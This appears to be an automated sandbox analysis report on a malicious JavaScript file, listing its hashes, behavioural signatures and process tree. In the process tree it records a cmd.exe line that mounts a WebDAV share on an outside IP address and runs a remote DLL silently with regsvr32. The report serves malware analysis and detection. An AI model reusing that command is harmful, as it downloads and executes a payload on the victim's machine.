Analysis
-
max time kernel
140s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23-07-2024 03:18
Static task
static1
Behavioral task
behavioral1
Sample
b39258e1d37a06c8560f97c10b22584aa94702353a4be38056b7bf816ef6d99c.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
b39258e1d37a06c8560f97c10b22584aa94702353a4be38056b7bf816ef6d99c.js
Resource
win10v2004-20240709-en
General
-
Target
b39258e1d37a06c8560f97c10b22584aa94702353a4be38056b7bf816ef6d99c.js
-
Size
4KB
-
MD5
6ccc4df732256376696a71607bf608f4
-
SHA1
5ffcba9f9e07d6a209b0ba62ab5e6c464d046470
-
SHA256
b39258e1d37a06c8560f97c10b22584aa94702353a4be38056b7bf816ef6d99c
-
SHA512
a1d650311a46964d50837d550d2177bf0794bdb86282741809a4953f741bcb33267e9a4cf8ed24f4d06e1b4021160767b9cfe2fbf70b6a8630d1dcd63286563e
-
SSDEEP
96:YPSz/Rj9HVYa1+7q71qL6G3HVgYHVstHV12x1qLTHVv2aBcX7HVK/HPZqEIqA//Y:lDnk/dAkGk/dP2
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 5024 wrote to memory of 4492 5024 wscript.exe 84 PID 5024 wrote to memory of 4492 5024 wscript.exe 84 PID 4492 wrote to memory of 1604 4492 cmd.exe 86 PID 4492 wrote to memory of 1604 4492 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\b39258e1d37a06c8560f97c10b22584aa94702353a4be38056b7bf816ef6d99c.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\5739137043878.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:1604
-
-